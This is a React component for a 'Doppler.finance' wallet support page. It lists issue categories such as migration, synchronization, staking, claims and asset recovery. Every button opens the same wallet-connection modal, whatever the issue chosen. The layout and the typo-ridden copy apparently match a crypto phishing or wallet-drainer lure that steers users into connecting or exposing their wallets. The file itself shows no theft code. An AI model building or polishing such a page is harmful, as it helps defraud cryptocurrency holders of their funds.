import { useWalletModal } from './WalletModalContext';
import '../styles/EveryAction.css';

const ACTIONS = [
  {
    id: 'MIGRATION ISSUES',
    label: 'MIGRATION ISSUES',
    description:
      'Token or account migration help.',
  },
  {
    id: 'SYNCHRONIZATION',
    label: 'SYNCHRONIZATION',
    description:
      'Connection rejected, unsupported wallet, wrong network, or the app is not detecting your account.',
  },
  {
    id: 'TRANSACTION ISSUES',
    label: 'TRANSACTION ISSUES',
    description:
      'Find and resolve failed, pending, or out-of-gas transactions. Have the tx hash ID ready.',
  },
  {
    id: 'TOKEN BALANCE MISSING',
    label: 'TOKEN BALANCE MISSING',
    description:
      'Token is on-chain but not reflecting in the wallet, wrong network selected, or a custom token that needs the contract address added.',
  },
  {
    id: 'STAKING ISSUES',
    label: 'STAKING ISSUES',
    description:
      'Rewards not showing, stake failed, or a lock/unstake that did not complete.',
  },
  {
    id: 'CLAIM ISSUES',
    label: 'CLAIM ISSUES',
    description:
      'Unable to claim staking, $XDP token, farm, or vault rewards that are due.',
  },
  {
    id: 'SWAP ISSUES',
    label: 'SWAP ISSUES',
    description:
      'Failed, pending, or stuck swaps on all DOPPLER DEXs, including routing errors and slippage.',
  },
  {
    id: 'REVOKE TOKEN PERMISSIONS',
    label: 'REVOKE TOKEN PERMISSIONS',
    description:
      'Manage and revoke smart-contract permissions from dApps you no longer use to regain control over token access and minimize exposure risks.',
  },
  {
    id: 'ASSET RECOVERY',
    label: 'ASSET RECOVERY',
    description:
      'Located and restore lost, inaccessible or unidexed digital assets using guided tooks and protocol level validation.',
  },
  
];

export default function EveryAction({ zIndex }) {
  const { open } = useWalletModal();

  return (
    <section className="every-action" style={{ zIndex }}>
      <div className="every-action__topbar">
        <span className="every-action__brand">Doppler.finance</span>
        <span className="every-action__pill">
          <span className="every-action__pill-brace">{'{'}</span>
          Wallet
          <span className="every-action__pill-brace">{'}'}</span>
        </span>
      </div>

      <h2 className="every-action__heading">
        <span className="every-action__muted">Need help? Select a category below to diagnose and resolve your issue with the </span>{' '}
        <span className="every-action__bold">support team.</span>
      </h2>

      <div className="every-action__grid">
        {ACTIONS.map((action) => (
          <button
            key={action.id}
            type="button"
            className="action-card"
            onClick={open}
          >
            <span className="action-card__label">
              <span className="action-card__dot" aria-hidden="true" />
              {action.label.toUpperCase()}
            </span>
            <p className="action-card__desc">{action.description}</p>
          </button>
        ))}
      </div>
    </section>
  );
}